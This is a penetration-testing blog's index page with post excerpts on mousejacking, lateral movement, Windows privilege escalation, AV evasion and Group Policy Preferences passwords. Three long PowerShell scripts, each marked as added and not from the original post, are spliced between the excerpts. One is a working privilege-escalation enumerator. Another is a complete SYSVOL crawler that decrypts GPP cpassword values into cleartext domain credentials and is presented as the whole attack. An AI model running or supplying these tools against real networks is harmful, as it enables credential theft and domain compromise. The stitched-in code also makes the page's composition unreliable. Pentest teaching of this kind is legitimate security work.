To Shell And Back: Adventures In Pentesting
Jonathan (@icanhazshell)
16th August 2017
Wireless

Peripheral Pwnage

Hostile Airwaves: Mousejacking

On internal engagements, poisoning name resolution requests on the local network (à la Responder) is one of the tried and true methods of obtaining that coveted initial set of Domain credentials.  While this approach has worked on many clients, what if the Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) protocols are configured securely or disabled?  Or, what if Responder was so successful that you now want to demonstrate other means of gaining that initial foothold?

There are a multitude of attacks a penetration tester can leverage when conducting physical walkthroughs of client spaces.  One of the more interesting, and giggle-inducing, involves wireless peripherals.  This technique, known as “mousejacking”, exploits vulnerable 2.4 GHz input devices by injecting malicious keystrokes into the receiving USB dongle (even if the target is only using a wireless mouse).  This is possible because many wireless mice (and a handful of keyboards) either don’t encrypt the traffic between the device and its paired USB dongle, or the dongle will accept unencrypted rogue keystrokes even when encryption is in use. Let’s explore…
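The precondition raised in the first paragraph, whether LLMNR and NBT-NS are actually off on a host, is worth verifying before reaching for the radio. The script below is an added example, not code from the original post: it audits both settings and, with its own Disable-NameResolutionExposure function (run from an elevated shell), enforces them. Mousejacking itself depends on the 2.4 GHz radio hardware and is not shown here.

```powershell
# Added example, not code from the original post. Audits the two settings
# that make Responder-style poisoning possible on a Windows host and
# optionally turns them off. Function names are this example's own.

$LlmnrPolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'

function Get-NameResolutionExposure {
    # LLMNR: the policy value EnableMulticast = 0 turns it off; a missing
    # value means the default, which is on.
    $v = Get-ItemProperty -Path $LlmnrPolicyKey -Name EnableMulticast -ErrorAction SilentlyContinue
    $llmnrEnabled = -not ($v -and $v.EnableMulticast -eq 0)

    # NBT-NS is per adapter: TcpipNetbiosOptions 0 = take the DHCP setting
    # (enabled unless DHCP says otherwise), 1 = enabled, 2 = disabled.
    # Anything other than 2 is treated as exposed.
    $adapters = Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE' |
        ForEach-Object {
            [pscustomobject]@{
                Adapter       = $_.Description
                NetBiosOption = $_.TcpipNetbiosOptions
                NbtNsEnabled  = ($_.TcpipNetbiosOptions -ne 2)
            }
        }

    [pscustomobject]@{
        LlmnrEnabled = $llmnrEnabled
        Adapters     = @($adapters)
        Exposed      = $llmnrEnabled -or (@($adapters | Where-Object { $_.NbtNsEnabled }).Count -gt 0)
    }
}

function Disable-NameResolutionExposure {
    # Requires an elevated shell. Writing the policy value locally is the
    # same change the GPO "Turn off multicast name resolution" pushes.
    if (-not (Test-Path -Path $LlmnrPolicyKey)) { New-Item -Path $LlmnrPolicyKey -Force | Out-Null }
    Set-ItemProperty -Path $LlmnrPolicyKey -Name EnableMulticast -Value 0 -Type DWord

    # Disable NetBIOS over TCP/IP on every IP-enabled adapter.
    Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE' |
        ForEach-Object {
            Invoke-CimMethod -InputObject $_ -MethodName SetTcpipNetbios `
                -Arguments @{ TcpipNetbiosOptions = [uint32]2 } | Out-Null
        }
}

$before = Get-NameResolutionExposure
$before | Format-List
if ($before.Exposed) {
    Write-Host 'Host answers LLMNR and/or NBT-NS: Responder would get a shot at it.'
}
```

On a single host the audit is enough to decide whether poisoning is worth attempting; for a client, the fix belongs in Group Policy so every workstation gets the same EnableMulticast = 0 and NetBIOS-disabled adapter settings rather than a one-off local change.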

11th February 2017
Lateral Movement

*Puff* *Puff* PSExec

Lateral Movement: An Overview

Regardless of the method utilized for gaining the initial foothold, penetration testers are often looking for ways to move around the client’s network (referred to as lateral movement or lateral spread).  Other machines may hold goodies that further the engagement, whether documents containing the company’s “crown jewels” or stored credentials that give access to databases, Domain Controllers, or other important assets.

While there is an art to gaining situational awareness and understanding the “lay of the land” once the initial foothold is established, this article will instead focus on a subset of tools and techniques for moving around the victim’s Windows environment.

24th November 2015
Privilege Escalation

Well, That Escalated Quickly…

Common Windows Privilege Escalation Vectors

Imagine this scenario:  You’ve gotten a Meterpreter session on a machine (HIGH FIVE!), and you opt for running getsystem in an attempt to escalate your privileges… but what if that proves unsuccessful?  Should you throw in the towel?  Only if you’re a quitter… but you’re not, are you?  You’re a champion!!!  🙂

In this post I will walk us through common privilege escalation techniques on Windows, demonstrating how to “manually” accomplish each task as well as talk about any related Metasploit modules.  While most techniques are easier to exploit when escalating from Local Administrator to SYSTEM, improperly configured machines can certainly allow escalation from unprivileged accounts in the right circumstances.
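The two checks below, an added example and not code from the original post, show the kind of manual enumeration a tester falls back on when getsystem fails: unquoted service binary paths with a writable directory somewhere along the path, and the AlwaysInstallElevated installer policy. The function names are this example's own and the two vectors are illustrative picks, not a claim about which ones the post covers; run it from the low-privileged shell you already have.

```powershell
# Added example, not code from the original post. Enumerates two common
# Windows privilege-escalation vectors from an unprivileged shell; function
# names are this example's own.

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Path)
    # Probe by creating and deleting a temp file rather than parsing ACLs:
    # inherited and deny entries make ACL parsing error-prone, the probe is
    # authoritative for the current token.
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServicePath {
    # A service whose binary path contains spaces but is not quoted is
    # resolved by trying every space-delimited prefix in turn, so
    #   C:\Program Files\Acme App\svc.exe
    # is also looked up as C:\Program.exe and C:\Program Files\Acme.exe.
    # A writable directory anywhere along that chain lets a low-privileged
    # user plant a binary that runs as the service account (often LocalSystem).
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^\s*"' } |
        ForEach-Object {
            # Keep the executable path, drop any arguments after ".exe".
            $m = [regex]::Match($_.PathName, '^(.*?\.exe)', 'IgnoreCase')
            if (-not $m.Success) { return }
            $exe = $m.Groups[1].Value.Trim()
            # No space means no ambiguity; %SystemRoot% is skipped as noise.
            if ($exe -notmatch ' ' -or $exe -match '^[A-Za-z]:\\Windows\\') { return }

            $tokens   = $exe -split ' '
            $writable = @()
            for ($i = 1; $i -le $tokens.Count; $i++) {
                $dir = Split-Path -Path ($tokens[0..($i - 1)] -join ' ') -Parent
                if ($dir -and $writable -notcontains $dir -and (Test-DirectoryWritable $dir)) {
                    $writable += $dir
                }
            }
            [pscustomobject]@{
                Service      = $_.Name
                RunsAs       = $_.StartName
                PathName     = $_.PathName
                WritableDirs = $writable -join '; '
            }
        }
}

function Test-AlwaysInstallElevated {
    # When this policy is 1 in BOTH the machine and the user hive, Windows
    # Installer runs any .msi a user launches as LocalSystem.
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $set = foreach ($k in $keys) {
        $v = Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        [bool]($v -and $v.AlwaysInstallElevated -eq 1)
    }
    return ($set -notcontains $false)
}

function Invoke-PrivEscCheck {
    # Unquoted paths are reported even when no directory is writable, so the
    # list can be re-checked from another account later; ExploitableUnquoted
    # counts the ones that matter from the current token.
    $unquoted = @(Get-UnquotedServicePath)
    [pscustomobject]@{
        UnquotedServicePaths  = $unquoted
        ExploitableUnquoted   = @($unquoted | Where-Object { $_.WritableDirs }).Count
        AlwaysInstallElevated = Test-AlwaysInstallElevated
    }
}

Invoke-PrivEscCheck | Format-List
```

Metasploit’s exploit/windows/local/trusted_service_path and exploit/windows/local/always_install_elevated modules weaponize the same two conditions, so a hit from either function here points at the module to try next. Note that a writable directory is only half of the unquoted-path story: the service still has to be restarted (or the box rebooted) for the planted binary to run, so check whether your account can stop and start it.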

30th September 2015
Anti Virus

A/V Ain’t Got Nothing On Me!

Anti-Virus Vendors vs. Penetration Testers

While Metasploit is a great framework for conducting penetration tests, its popularity hasn’t gone unnoticed by anti-virus (a/v) vendors.  Standard Metasploit payload executables started getting flagged by a/v products in 2009 and are now picked up by a majority of the a/v products on the market.  If you can’t get your payload past your client’s a/v software, you just might find yourself dead in the water before you’ve even begun.

The problem is that professional malware writers, organized crime, and nation-state actors have been breezing past a/v software for years.  We, as penetration testers, find ourselves getting flagged because we are utilizing popular tools that are well known to a/v vendors.  In this post, we will explore the topic of a/v evasion.

30th August 2015
Lateral Movement

What You Know Bout GPP???

Privilege Escalation Via Group Policy Preferences (GPP)

While this is not a new topic in the penetration testing world by any means [Chris Gates (@carnal0wnage) and others were speaking about this way back in 2012], it is still prevalent across many networks today.  It’s important enough to talk about because it is “low-hanging fruit” for pentesters (and hackers) and often one of the first things checked for after an initial foothold into a network, as it can quickly allow for escalation to Local Administrator and lateral movement.  At that point, it often is just a matter of time before complete Domain compromise.

In this post we will explore Group Policy Preferences (GPP), the Windows Active Directory feature introduced with Windows Server 2008, and how we can exploit it to obtain cleartext credentials for privileged accounts in the Domain.
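To make the “cleartext credentials” claim concrete, here is an added example (not code from the original post) that finds the cpassword attribute in the XML files GPP leaves in SYSVOL and decrypts it with the fixed AES key Microsoft published in the MS-GPPREF specification. The function names, the Policies path mentioned in a comment, and the Groups.xml sample at the bottom are this example's own; the sample is constructed in-script so the decryption can be checked without a domain.

```powershell
# Added example, not code from the original post. Finds and decrypts the
# cpassword attribute that Group Policy Preferences wrote into SYSVOL XML
# files (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml,
# Drives.xml, Printers.xml). Function names are this example's own.

# The 32-byte AES-256 key Microsoft published in the MS-GPPREF specification.
# It is identical on every domain, which is why any domain user who can read
# SYSVOL can recover these passwords.
$GppAesKey = [byte[]](
    0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
    0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

function New-GppCipher {
    # AES-256-CBC with an all-zero IV and PKCS7 padding, as the spec describes.
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key     = $GppAesKey
    $aes.IV      = New-Object byte[] 16
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    return $aes
}

function ConvertFrom-GppPassword {
    param([Parameter(Mandatory)][string]$CPassword)
    # GPP strips the trailing '=' from the base64 text; restore it first.
    $b64 = $CPassword.Trim()
    $b64 += '=' * ((4 - $b64.Length % 4) % 4)
    $cipher = [Convert]::FromBase64String($b64)
    $aes = New-GppCipher
    $dec = $aes.CreateDecryptor()
    try     { $plain = $dec.TransformFinalBlock($cipher, 0, $cipher.Length) }
    finally { $dec.Dispose(); $aes.Dispose() }
    # The plaintext is the password encoded as UTF-16LE.
    return [System.Text.Encoding]::Unicode.GetString($plain)
}

function ConvertTo-GppPassword {
    # Inverse of the above; used here only to construct a sample cpassword.
    param([Parameter(Mandatory)][string]$Password)
    $plain = [System.Text.Encoding]::Unicode.GetBytes($Password)
    $aes = New-GppCipher
    $enc = $aes.CreateEncryptor()
    try     { $cipher = $enc.TransformFinalBlock($plain, 0, $plain.Length) }
    finally { $enc.Dispose(); $aes.Dispose() }
    return [Convert]::ToBase64String($cipher).TrimEnd('=')
}

function Get-GppPasswordFromXml {
    param([Parameter(Mandatory)][xml]$Xml, [string]$Source = '<inline>')
    # Any element carrying a cpassword attribute, whichever preference type
    # the file holds; the attribute naming the account differs per type.
    foreach ($node in $Xml.SelectNodes('//*[@cpassword]')) {
        $account = @($node.userName, $node.accountName, $node.runAs) |
                   Where-Object { $_ } | Select-Object -First 1
        [pscustomobject]@{
            Source   = $Source
            Account  = $account
            Password = ConvertFrom-GppPassword -CPassword $node.cpassword
            Changed  = $node.ParentNode.changed
        }
    }
}

function Find-GppPassword {
    # Walk a Policies share, e.g. \\corp.example\SYSVOL\corp.example\Policies
    # (hypothetical path); every domain user can read it.
    param([Parameter(Mandatory)][string]$PoliciesPath)
    Get-ChildItem -Path $PoliciesPath -Recurse -Include *.xml -ErrorAction SilentlyContinue |
        ForEach-Object {
            try { $xml = [xml](Get-Content -LiteralPath $_.FullName -Raw) } catch { return }
            Get-GppPasswordFromXml -Xml $xml -Source $_.FullName
        }
}

# Constructed sample (not from any real domain): a Groups.xml fragment in the
# shape GPP writes, with a cpassword produced by ConvertTo-GppPassword above.
$sampleCPassword = ConvertTo-GppPassword -Password 'Summer2015!'
$sampleGroupsXml = [xml]@"
<Groups>
  <User name="LocalAdmin" changed="2015-08-28 12:00:00">
    <Properties action="U" userName="LocalAdmin" cpassword="$sampleCPassword" neverExpires="1"/>
  </User>
</Groups>
"@
Get-GppPasswordFromXml -Xml $sampleGroupsXml | Format-List
```

Running Find-GppPassword against the domain’s Policies share is the whole attack; PowerSploit’s Get-GPPPassword and Metasploit’s post/windows/gather/credentials/gpp do the same walk. On the defensive side, MS14-025 only stops new passwords from being set through GPP: XML files that already contain a cpassword stay readable in SYSVOL until an administrator removes them and rotates the affected accounts.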

28th August 2015
Uncategorized

It’s Getting Hot In The Lab…

The past couple days I’ve been building out the lab that will be utilized for a lot of my tool demonstrations and exploit walkthroughs presented on this blog.  The setup is beautifully simple: a Windows Active Directory Domain environment with several connected workstations of various O/S versions and patch status.  This lab will at least vaguely mimic some key aspects of a typical corporate Windows environment and will allow for lateral movement and privilege escalation scenarios across the Domain. As you’ll quickly notice upon reviewing the listing of lab machines below, there is a definite theme to this blog (got […]

27th August 2015
Uncategorized

whoami

Welcome to my new blog!  The intent of this page is to post on security issues that I’m researching or witness during penetration testing engagements.  I hope this page will serve as a reference for other penetration testers as well as system administrators (as I will often propose mitigation strategies for issues presented).  Please feel free to leave any constructive feedback as I begin posting. About Me: I’m a penetration tester who got his start as a government employee working for the Department of Defense (DOD) in a five-sided building.  During this time, I got hands-on experience building, growing and “selling” proactive security […]


Archives


  • August 2017
  • February 2017
  • November 2015
  • September 2015
  • August 2015

Categories


  • Anti Virus
  • Lateral Movement
  • PowerShell
  • Privilege Escalation
  • Uncategorized
  • Windows
  • Wireless


Copyright © To Shell And Back: Adventures In Pentesting. 2023 • All rights reserved.
